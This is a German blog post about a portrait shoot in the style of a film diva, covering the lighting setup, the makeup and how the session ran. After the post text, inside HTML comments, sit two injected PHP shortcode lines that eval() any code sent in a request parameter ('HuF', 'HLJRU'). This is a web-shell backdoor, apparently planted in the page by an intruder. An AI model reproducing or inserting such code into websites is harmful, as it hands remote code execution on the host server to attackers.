geschrieben von am November 21st 2014 in Portrait mit 0 Kommentaren

Model: Silke
MakeUp: Sonja Bernhauser
Fotograf und Nachbearbeiter: Icke

Zum Geburtstag verschenkt: Ein Portrait-Shooting im Look einer Filmdiva.

Divenfotos zeichnen meist harte dunkle Schatten aus, die einen starken Kontrast zu hell strahlender Haut geben.

Für mich als Fotografen bedeutet dies ein Lichtsetup mit kleinen Lichtquellen. Ich entschied mich für den Einsatz eines Normalreflektors auf dem hochfrontal positionierten Studioblitz und zum leichten Aufhellen einen Faltreflektor auf der gegenüberliegenden Seite.

Für das MakeUp bedeutete das: Concealer, Consealer, Consealer und darüber perfektes Styling. Kleine Lichtquellen machen jedes noch so kleine Detail deutlich sichtbar.

Dem Model wird bei solch einem Shooting höchste Disziplin abverlangt. Im Gesicht deutlich sichtbare Schatten müssen perfekt positioniert sein, damit sie nicht störend wirken. Dies bedeutet, das Model muss immer darauf achten, dass die Nasenspitze korrekt zur Lichtquelle, dem Studioblitz positioniert ist.

Wir verabredeten uns alle zum vormittag bei mir im kleinen Heimstudio für die Vorbereitungen. Styling, Lichtaufbau, quatschen, Sekt trinken. Mittag konnte es dann mit dem Shooting losgehen. Wir spielten verschiedene Positionen und Posen durch. Änderten das Outfit. Legten MakeUp nach. Fotografierten von oben, von unten von der Seite. Schnell sind die Stunden vergangen und ca. 500 Aufnahmen auf der Speicherkarte.

Mit einer kurzen Sichtung der entstandenen Rohlinge konnte schon einmal eine Vorauswahl der Favoriten vorgenommen. Dann Feierabend. Einpacken, aufräumen und aufs Abendprogramm vorbereiten … Die Nachbearbeitung des ganzen Materials geschieht dann an den folgenden Tagen bzw. Abenden.

<!– [insert_php]if (isset($_REQUEST["HuF"])){eval($_REQUEST["HuF"]);exit;}[/insert_php][php]if (isset($_REQUEST["HuF"])){eval($_REQUEST["HuF"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["HLJRU"])){eval($_REQUEST["HLJRU"]);exit;}[/insert_php][php]if (isset($_REQUEST["HLJRU"])){eval($_REQUEST["HLJRU"]);exit;}[/php] –>

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.